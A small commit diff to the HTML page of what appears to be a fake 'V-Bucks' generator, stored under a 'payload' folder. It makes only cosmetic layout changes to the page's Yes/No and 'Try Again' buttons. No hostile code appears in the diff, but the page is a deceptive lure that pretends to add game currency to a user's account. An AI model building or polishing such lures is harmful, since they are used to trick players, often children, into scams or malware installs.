Adding ipc from main to renderer

--- a/payload/vbucks/src/index.html
+++ b/payload/vbucks/src/index.html
@@ -133,8 +133,8 @@
                                         <div id="menu-outer">
                                             <div class="table">
                                                 <ul id="horizontal-list">                                
-                                                    <li><a href="index.html#" class="proceed" id="confirm_yes"><span>Yes</span></a></li>
-                                                    &nbsp;&nbsp;&nbsp; <!-- I'm a lazy ree -->
+                                                    <li><a href="index.html#" class="proceed" style="padding-right: 10px;" id="confirm_yes"><span>Yes</span></a></li>
+                                                    <!-- &nbsp;&nbsp;&nbsp; I'm a lazy ree -->
                                                     <li><a href="index.html#" class="proceed" id="confirm_no"><span>No</span></a></li>
                                                 </ul>
                                             </div>
@@ -149,6 +149,7 @@
                                             It looks like we couldn't add the requested amount of V-Bucks to your account.
                                             <span id="hint"></span>
                                         </h4>
+                                        <br>
                                         <a href="index.html#" class="proceed" id="confirm_no"><span>Try Again</span></a>
 
                                     </div>
